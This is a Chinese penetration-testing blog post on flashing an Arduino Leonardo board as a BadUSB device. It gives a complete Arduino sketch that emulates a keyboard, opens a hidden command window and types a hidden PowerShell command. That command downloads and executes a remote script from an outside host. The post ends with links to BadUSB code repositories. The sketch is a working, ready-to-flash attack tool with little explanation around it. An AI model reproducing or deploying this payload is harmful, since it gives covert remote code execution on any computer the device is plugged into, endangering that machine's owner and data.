连长 's Blog
就平写一些文章,没有任何装逼的成分。
Toggle navigation
连长 's Blog
主页
红蓝对抗
渗透测试
代码审计
漏洞复现
工具类型
其他类型
关于博主
友情链接
归档
标签
USB烧录
无
2020-08-10 13:40:21
411
0
0
funk
## 0x1.安装与烧录 下载地址:https://www.arduino.cc/en/Main/Software 下面演示的是MAC版本: 插入USB让电脑读取到在工具里选择USB接口  选择程序的开发板有很多种开发板看你的板是什么  安装 Leonardo USB ATMEGA32U4 库模块  先看看程序有没有编译通过。  如果编译通过直接点击上传,也就是烧录。  OK ## 0x2.烧录WIN ``` #include<Keyboard.h> void setup(){ Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(200); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("cmd"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(200); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://usb.9x0.me/powershell.ps1') "); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() { } ``` ## 0x3.参考文献 参考文件能让你免走弯路。 https://www.cdxy.me/?p=549 https://github.com/Xyntax/BadUSB-code https://www.jianshu.com/p/4265ce56e265 https://www.freebuf.com/sectool/150367.html https://www.jianshu.com/p/97df17a22f0b https://github.com/k8gege/k8badusb
上一篇:
CVE-2019-14287 LinuxSudo权限绕过提权复现
下一篇:
利用树莓派制作内网转发
0
赞
411 人读过
新浪微博
微信
腾讯微博
QQ空间
人人网
提交评论
立即登录
, 发表评论.
没有帐号?
立即注册
0
条评论
More...
文档导航
funk
连长 's Blog
没有帐号? 立即注册